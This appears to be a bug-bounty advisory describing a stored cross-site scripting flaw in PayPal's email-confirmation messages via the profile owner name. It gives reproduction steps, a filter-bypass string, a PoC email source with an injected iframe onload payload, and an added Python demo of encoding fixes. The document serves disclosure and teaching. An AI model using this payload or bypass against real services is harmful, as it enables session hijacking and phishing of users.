PayPal Inc Bug Bounty Program 2016 - New Vulnerability Uncovered by German Researcher
Researcher exploits Profile Service Mails via Filter Bypass Issue
The core research team of the Vulnerability Laboratory discovered this morning a new vulnerability in the PayPal Inc online service core web application and API. The issue was uncovered by Benjamin Kunz Mejri during his participation in PayPal's official bug bounty program. After the PayPal Inc security department received the first analysis report of the issue, a fix was prepared immediately to protect the infrastructure and customers against active exploitation.
During long-term testing we were able to verify a new vulnerability with an older registered account by accessing the profile panel. The account email@example.com was registered with special characters in the owner-name input fields. By registering multiple email addresses to the account we were able to stream the malicious payload stored in the account's owner name to another connected PayPal user email address (firstname.lastname@example.org). The owner-name input field does not encode the injected special characters. When an email address that already belongs to an existing account is added to another account for sharing, the address has to be confirmed through a link sent by email. In this email the injected owner-name payload executes in the user's mailbox. The PayPal web server does not filter the already stored input and passes it as a raw string into the confirmation mail sent to the registered address. The result is execution of the payload in the mailbox of the target account that was added. The server's mail is delivered through PayPal's main email sender (email@example.com).
A filter on an automated appliance was later activated that makes executable code invisible when the confirmation email is processed for sending. In our tests every second email was altered by the server, which wrapped the payload in `div style=``display:none; color:fff; font-size:1pt;`. Whether this validation patch was applied manually or coordinated automatically with the processing step, we used another method to bypass it.
To bypass the filter and edit the value=`` attribute, the owner name is updated to [payload]+input and the value is changed to value=`anything src=`/`, so that `anything` becomes the attribute value and src=``/`` becomes a new parameter inside the input form code. We used the same method to confirm vulnerability 120 with EIBBP-32718.
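The following Python example is added here to illustrate the three behaviours described above; it is not part of the advisory and not PayPal's code. It reconstructs, with a constructed payload modelled on the one in the PoC source below, the owner name pasted raw into the email greeting, the same string wrapped in the appliance's hidden div, and the attribute-context input field on the profile form, each beside a properly encoded version, and parses every rendering with the standard library's HTMLParser to show which ones still contain an element a mail client would instantiate. The function names, template fragments, the payload and the bypass string are assumptions made for the illustration.

```python
import html
from html.parser import HTMLParser

# Constructed payload modelled on the advisory's PoC source: it closes the
# enclosing attribute/tag and drops an iframe with an onload handler into
# whatever follows. (Assumption: single quotes inside alert() so the string
# survives being placed in a double-quoted attribute.)
PAYLOAD = '"><iframe src="a" onload="alert(\'VL\')">'

# Constructed attribute-injection string for the bypass step: it contains no
# '<' at all, it only terminates value="..." and adds a new src="..." attribute.
BYPASS = 'anything" src="/'


# --- profile form: the owner name lands in an attribute context -----------

def render_profile_input_vulnerable(owner_name):
    """Owner-name field as a naive template emits it. A '"' inside the name
    terminates the attribute; everything after it becomes new markup."""
    return f'<input name="ownername" value="{owner_name}">'


def render_profile_input_safe(owner_name):
    """Same field with attribute-context encoding. quote=True turns '"' into
    &quot; (and < > & into entities), so the value cannot leave the attribute."""
    return f'<input name="ownername" value="{html.escape(owner_name, quote=True)}">'


# --- confirmation email: the owner name lands in the greeting text ---------

GREETING_TAIL = "<p>Confirm your email address now to let us know it really belongs to you.</p>"


def render_greeting_vulnerable(owner_name):
    """Greeting built by string concatenation, the defect the advisory
    describes: the mail client parses whatever the owner name contains."""
    return f"<p>Hello {owner_name}{GREETING_TAIL}"


def render_greeting_hidden_div(owner_name):
    """The appliance-style 'fix' from the advisory: wrap the untrusted string
    in an invisible div. Invisible markup is still parsed into elements, so the
    iframe and its onload handler are still created."""
    return ('<div style="display:none; color:fff; font-size:1pt;">'
            f"{owner_name}</div>{GREETING_TAIL}")


def render_greeting_safe(owner_name):
    """Correct fix: entity-encode for the HTML text context at output time, so
    the payload is displayed as text instead of being parsed as markup."""
    return f"<p>Hello {html.escape(owner_name)}{GREETING_TAIL}"


# --- check: parse the rendered fragment the way a client would -------------

class ActiveContentScanner(HTMLParser):
    """Collects every start tag with its attributes and flags the ones that
    execute script (scriptable elements and on* event handlers)."""
    SCRIPTABLE = {"iframe", "script", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.tags = []       # list of (tag, {attr: value}) in document order
        self.findings = []   # human-readable markers of executable content

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))
        if tag in self.SCRIPTABLE:
            self.findings.append(f"<{tag}>")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag} {name}>")


def scan(rendered):
    scanner = ActiveContentScanner()
    scanner.feed(rendered)
    scanner.close()
    return scanner


def active_content(rendered):
    """Scriptable tags / handlers a client would instantiate; [] means none."""
    return scan(rendered).findings


def attributes_of(rendered, tag):
    """Attributes of the first `tag` element, to see whether the bypass string
    became a real attribute or stayed inside the value."""
    for name, attrs in scan(rendered).tags:
        if name == tag:
            return attrs
    return {}


if __name__ == "__main__":
    for label, fn in [("greeting (vulnerable)", render_greeting_vulnerable),
                      ("greeting (hidden div)", render_greeting_hidden_div),
                      ("greeting (encoded)", render_greeting_safe)]:
        print(f"{label:22s} -> {active_content(fn(PAYLOAD)) or 'nothing active'}")
    print("bypass, vulnerable:", attributes_of(render_profile_input_vulnerable(BYPASS), "input"))
    print("bypass, encoded:   ", attributes_of(render_profile_input_safe(BYPASS), "input"))
```

The hidden-div rendering is the instructive one: the wrapper only changes how the element is displayed, while the parser still creates the iframe and attaches its onload handler, which is why the advisory's payload kept firing. The bypass string shows the second gap: a filter that looks for tags or script does not see `anything" src="/`, yet in the unencoded input it turns into a separate src attribute. Encoding for the output context (text or attribute) at render time closes both paths without trying to recognise payloads.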
The security risk of the persistent input validation web vulnerability is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 3.8. Exploitation of the persistent input validation web vulnerability requires a low-privilege web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external sources, and persistent manipulation of the affected or connected service module context.
Request Method(s): Inject
[+] PayPal Account - Profile Account Settings - Unconfirmed Email Account
Proof of Concept
Manual steps to reproduce the vulnerability ...
1. Register a PayPal Inc account
2. Inject a payload as the owner name in the PayPal user profile
3. Use the filter bypass method to get the input processed
4. Browse to the profile where the email addresses are visible and click the unconfirmed flag button
Note: The service now takes the payload and streams the code into the confirmation mails sent to the PayPal user's email accounts
5. Open the mailbox of one of the registered addresses that is still unconfirmed and look at the header
6. The code executes in the header section next to the introduction sentence containing the vulnerable owner-name value
7. Successful reproduction of the security vulnerability!
PoC: Source (Confirm Email Address)
Confirm your email address ...
Hello %20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY VIA OWNERNAME!]iframe src="a" onload="alert("VL")" <,<="" p=""><p>Confirm your email address
now to let us know it really belongs to you.</p> <p>Once that's done, you're ready to receive money.</p> <p>If you are unable to click the button below to confirm your
email, please follow this link <span class="confidential">https://www.paypal.com/de/ece/?cn=00622082609784738416&em=research@vulne... <p> <table align=left border="0"
cellspacing="0" cellpadding="0" class="mobile_button" width="100%"> <tbody> <tr> <td height="1" id="button_force_width"> <img height="1" border="0"
src="https://www.paypalobjects.com/webstatic/eCAT/GCE/spacer10.gif" style="display:block;" draggable="false"/> </td> </tr> <tr> <td> <table border="0"
cellspacing="0" cellpadding="0" class="mobile_button"> <tbody> <tr> <td width="1" height="30" id="force_height"> <img width="1" height="30" border="0"
src="https://www.paypalobjects.com/webstatic/eCAT/GCE/spacer10.gif" style="display:block;" draggable="false"/> </td> <td valign="middle" align="left"
class="button_style" style="font-family:HelveticaNeueLight,HelveticaNeue-Light,'Helvetica Neue Light',HelveticaNeue,Helvetica,Arial,sans-serif;font-weight:300;
font-stretch:normal;text-align:center;color:#fff;font-size:15px;background:#0079C1;;border-radius:7px!important; -moz-border-radius: 7px !important; -o-border-radius:
7px !important; -ms-border-radius: 7px !important;line-height:1.45em;padding:7px 15px 8px;margin:0 auto 16px;font-size:1em;padding-bottom:7px;">
<span class="confidential"><a type="Link" target="_BLANK" class="button " l-title="" linkId="7d8753434982d8bb33800b257d167211" style="color:#ffffff; text-decoration:none;
display:block; font-family:Arial,sans-serif; font-weight:bold; font-size:13px; line-height:15px;"
href="https://www.paypal.com/de/ece/?cn=00622082609784738416&em=research@vulne... style="color:#ffffff; text-decoration:none; display:block;
font-family:Arial,sans-serif; font-weight:bold; font-size:13px; line-height:15px;">Confirm your email</span></a></span> </td> </tr> </tbody> </table> </td> </tr>
</tbody> </table> </p> <br> <!--[if !mso]><!--> <br> <!--<![endif]--><p><p>Thanks,</p> <p>PayPal</p></p> </td> </tr> </tbody> </table> </td>
<td width="12" style="background:url(/i/scr/scr_emailRightBorder_13wx1h.gif) left repeat-y;border-right: 1px solid #ddd;">
<img src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" border="0" alt=""> </td> </tr> <tr> <td colspan="3">
<img height="13" src="https://www.paypalobjects.com/en_US/i/scr/scr_emailBottomCorners_580wx13... border="0" alt=""> </td> </tr> </tbody> </table>
<table border="0" cellpadding="0" cellspacing="0" id="emailFooter" style="padding-top:20px;font:12px Arial, Verdana, Helvetica, sans-serif;color:#292929;"
width="100%"><tbody><tr><td><p>Copyright © 1999-2015 PayPal. All rights reserved. PayPal (Europe) S.à r.l. et Cie, S.C.A. Société en Commandite
par Actions Registered Office: 22–24 Boulevard Royal, L-2449 Luxembourg RCS Luxembourg B 118 349</p><p class="footer ppid">PayPal PPC000372:4aab730d1f97</p></td></tr></tbody></table>
<img src="https://paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=PPC000... alt="" height="1" width="1" border="0"/>
<img src="https://t.paypal.com/ts?ppid=PPC000372&cnac=DE&rsta=en_DE(en_US)&cust=MLU5GPECNYWH8&unptid=315d1372-78d7-11e5-8112-d48564540750&t=&cal=4aab730d1f97&calc=4aab730d1f97&calf=4aab730d1f97&page=main:email&pgrp=main:email&e=op&mchn=em&s=ci&mail=sys" alt=""
height="1" width="1" border="0"/> </body> </html></div>
<table border="0" cellpadding="0" cellspacing="0" id="emailWrapperTable" width="580">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<td width="130px;"><a href="https://www.paypal.com"><img src="https://www.paypalobjects.com/en_US/i/logo/logo_emailheader_113wx46h.gif...
<img alt="" border="0" height="10" src="http://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1">
Afterwards the Vulnerability Laboratory team produced a live-hacking video of the vulnerability to demonstrate the impact. In the video we show the compromised test account with multiple email addresses, one of which is unconfirmed. In the user's profile a payload is saved as the owner name of the PayPal account. This owner name is taken into PayPal's confirmation email and sent from the original source. After switching to the mobile device we extract the sent message and save it as a plain HTML file, which results in execution. The bug is located on the application side and affects the email encoding for PayPal users. The issue could also affect other sections, which still has to be verified. The bypass method passes the payload through the filter so that it executes.
PayPal Inc Bug Bounty 2016 - Filter Bypass & Persistent Profil Mail Encoding Web Vulnerability
PayPal Inc finally acknowledged the vulnerability report and paid an undisclosed bounty to the Vulnerability Laboratory core research team.